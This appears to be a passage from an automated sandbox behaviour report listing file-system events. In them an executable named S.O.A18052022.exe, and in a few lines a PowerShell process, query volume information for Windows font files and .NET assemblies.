                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
